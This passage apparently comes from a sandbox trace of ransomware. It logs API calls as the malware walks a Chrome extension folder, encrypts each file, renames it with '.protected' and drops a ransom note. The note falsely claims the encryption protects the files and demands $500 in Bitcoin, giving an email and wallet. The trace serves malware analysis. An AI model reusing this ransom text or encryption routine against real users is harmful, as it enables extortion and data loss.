returned 1 [0080.306] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.protected") returned 153 [0080.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.protected")) returned 1 [0080.307] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="Windows") returned -1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="Program Files") returned -1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="Program Files (x86)") returned -1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="$Recycle.bin") returned 1 [0080.307] lstrcmpiW (lpString1="page_embed_script.js", lpString2="System Volume Information") returned -1 [0080.307] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.307] StrStrIW (lpFirst="page_embed_script.js", lpSrch=".protected") returned 0x0 [0080.307] lstrcmpW (lpString1="page_embed_script.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.307] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.307] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.308] StrStrW (lpFirst="page_embed_script.js", lpSrch=".txt") returned 0x0 [0080.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.308] StrStrW (lpFirst="page_embed_script.js", lpSrch=".rar") returned 0x0 [0080.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0080.308] StrStrW (lpFirst="page_embed_script.js", lpSrch=".zip") returned 0x0 [0080.308] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xe0, lpOverlapped=0x0) returned 1 [0080.309] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.309] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xe0, lpOverlapped=0x0) returned 1 [0080.309] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.309] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.309] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.309] CloseHandle (hObject=0x160) returned 1 [0080.309] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.protected") returned 160 [0080.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.protected")) returned 1 [0080.310] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0080.310] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0080.310] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales") returned 138 [0080.310] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0080.310] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0080.310] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*") returned 140 [0080.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.320] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.320] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.320] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.320] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.320] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.320] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\.") returned 140 [0080.320] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.320] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.321] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.321] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.321] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.321] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.321] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.321] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\..") returned 141 [0080.321] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.321] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.321] lstrcmpiW (lpString1="af", lpString2="Windows") returned -1 [0080.321] lstrcmpiW (lpString1="af", lpString2="Program Files") returned -1 [0080.321] lstrcmpiW (lpString1="af", lpString2="Program Files (x86)") returned -1 [0080.321] lstrcmpiW (lpString1="af", lpString2="$Recycle.bin") returned 1 [0080.321] lstrcmpiW (lpString1="af", lpString2="System Volume Information") returned -1 [0080.321] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af") returned 141 [0080.321] lstrcmpW (lpString1="af", lpString2=".") returned 1 [0080.321] lstrcmpW (lpString1="af", lpString2="..") returned 1 [0080.321] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*") returned 143 [0080.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.322] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.322] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.322] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.322] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.322] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.322] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\.") returned 143 [0080.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.322] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.323] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.323] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.323] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.323] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.323] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.323] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\..") returned 144 [0080.323] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.323] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.323] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.323] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.323] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.323] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.323] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.323] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.324] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.324] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0080.324] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.324] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x84, lpOverlapped=0x0) returned 1 [0080.325] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.325] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x84, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x84, lpOverlapped=0x0) returned 1 [0080.325] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.325] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.326] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.326] CloseHandle (hObject=0x168) returned 1 [0080.326] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.protected") returned 165 [0080.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.protected")) returned 1 [0080.327] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.327] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.327] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\RESTORE_FILES.txt") returned 159 [0080.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.328] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.328] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.328] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.329] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.329] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.329] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.329] CloseHandle (hObject=0x164) returned 1 [0080.329] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.329] lstrcmpiW (lpString1="am", lpString2="Windows") returned -1 [0080.329] lstrcmpiW (lpString1="am", lpString2="Program Files") returned -1 [0080.329] lstrcmpiW (lpString1="am", lpString2="Program Files (x86)") returned -1 [0080.329] lstrcmpiW (lpString1="am", lpString2="$Recycle.bin") returned 1 [0080.329] lstrcmpiW (lpString1="am", lpString2="System Volume Information") returned -1 [0080.329] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am") returned 141 [0080.329] lstrcmpW (lpString1="am", lpString2=".") returned 1 [0080.329] lstrcmpW (lpString1="am", lpString2="..") returned 1 [0080.329] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*") returned 143 [0080.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.329] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.330] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.330] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.330] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\.") returned 143 [0080.330] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.330] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.330] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.330] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\..") returned 144 [0080.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.330] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.330] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 